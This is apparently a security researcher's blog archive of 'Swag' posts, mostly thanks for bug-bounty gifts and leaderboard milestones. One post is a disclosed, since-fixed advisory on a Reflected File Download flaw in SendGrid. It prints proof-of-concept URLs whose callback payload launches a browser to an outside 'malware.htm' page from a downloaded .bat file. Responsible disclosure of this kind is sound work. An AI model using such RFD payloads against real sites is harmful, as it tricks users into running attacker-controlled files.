David Sopas – Web Security Researcher

Swag

07/01/16 Swag # , , , , ,

Companies that I’ve helped improve their security

Companies that I’ve helped improve their security

Google, Yahoo!, eBay, Microsoft, Etsy, Nexmo, Weebly, Edmodo, HackerOne, Desk, Adobe, ArubaNetworks, Condé Nast, Linkedin, Acunetix, SendGrid, Rocky Bytes, DepositFiles, Workable, MailChimp, Prestashop, HP, Kaspersky, OLX, RunKeeper, Tumblr, ESET, Symantec, Dowjones, Issuu, Jobs.cz, Alexa/Amazon, McAfee, Booking, AVG, Panda Security, Hootsuite, Circle, DoSomething, Zendesk, Nokia, 123 Contact Form, FoxyCart, Orkut, Segment.io and SilentCircle.

The other ones are private 🙂

0 likes no responses
09/11/15 Swag # ,

Thanks Edmodo for the swag

Thanks Edmodo for the swag

Got some cool gifts from Edmodo. Always glad to help others to improve their security 🙂

0 likes no responses
28/10/15 Advisories , Swag # , ,

SendGrid Reflected File Download

SendGrid Reflected File Download

For those who don’t know who SendGrid is…

SendGrid provides unmatched deliverability, scalability, and reliability. We deliver email on behalf of happy customers such as: Airbnb, Foursquare, Spotify and Uber.

They send over 19 billion emails per month.

When visiting their site I noticed a XHR request on my Google Inspector that caught my attention:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=jQuery171016384647646918893_1439389801565
&_=1439389801826

Which returned the following JSON information:

/**/jQuery171016384647646918893_1439389801565({“status”:”success”,”logged_in”
:false});

I noticed that the callback was called on the URL so I decided to inject my RFD vector:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=||start chrome websegura.net/malware.htm||

Reflecting:

/**/||start chrome websegura.net/malware.htm||({“status”:”success”,”logged_in”:false});

Now that I could reflect my payload and removed the variables that don’t do anything on my proof-of-concept and try to manipulate the filename without giving a HTTP error:

https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||

For Internet Explorer 8 and 9 you didn’t need anything else.
If you run this last URL it would automatically try to download freecoupons.bat file from sendgrid.com servers.

ie_sendgrid_rfd

On other modern browsers you needed the HTML5 download attribute.
The download would start just by clicking the image.

chrome_sendgrid_rfd

A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing SendGrid.com coupon codes
  2. Victim downloads the file thinking that is from a trusted domain [SendGrid.com]
  3. Malicious user gains control over victims machine

SendGrid were always on top of the issue [cool guys] and they were nice enough to send me a awesome t-shirt 🙂

Timeline:
12-08-2015 Reported this security issue to SendGrid
20-08-2015 SendGrid replied that was fixing the issue
29-09-2015 Asked for a update
27-10-2015 SendGrid reported that the issue is fixed

0 likes no responses
21/10/15 Swag # , , ,

Hack to the Future with Cobalt

Hack to the Future with Cobalt

Cobalt.io published a nice image on Twitter with some of the security researchers. Can you guess who’s there?

0 likes no responses
18/08/15 Swag # , ,

Tshirt, deck of cards and stickers from Cobalt.io

Tshirt, deck of cards and stickers from Cobalt.io

I would like to thank Cobalt.io team for the gift pack they sent me.
Working with them it’s awesome and I hope to keep helping and growing with you guys.

PS: Nice to be a Ace of Diamonds 🙂

Cheers!

0 likes no responses
06/08/15 Bug Bounty , Swag # , ,

First to reach 1000 rep score on Cobalt.io

First to reach 1000 rep score on Cobalt.io

Yes! I made it.

Since my registration on March this year I reached more than 1000 reputation points on Cobalt.io and become the first to do it.
Most of the points were made on private/invite only programs but a couple of them were also public in companies like Nexmo, Weebly, DoSomething and Circle.

My next goal? Keep having fun with the guys on Cobalt.io. They’ve a great team and are supported by many talented security researchers.

If you are a company who needs security checked by professionals just register your program.

0 likes no responses
03/08/15 Bug Bounty , Swag # ,

I’m number 1 on Cobalt.io

I’m number 1 on Cobalt.io

Just checked the Hall of Fame of Cobalt.io and I’m now number 1 in the rank. Not bad for a portuguese guy that started in March.

Next objective… 1000 points! Let’s go!

0 likes 2 responses
03/08/15 Swag # , ,

Mixpanel gave me a cool Tshirt

Mixpanel gave me a cool Tshirt

When I help companies to fix security issues I do not ask anything in return.

I come across a security issue on Mixpanel when auditing private client on Cobalt.io and I send to Mixpanel a little security advisory describing a Reflected Filename Download vulnerability with a couple of screenshots.
Mixpanel security team fixed the vulnerability very fast showing that they care about security.

Continue reading

0 likes 2 responses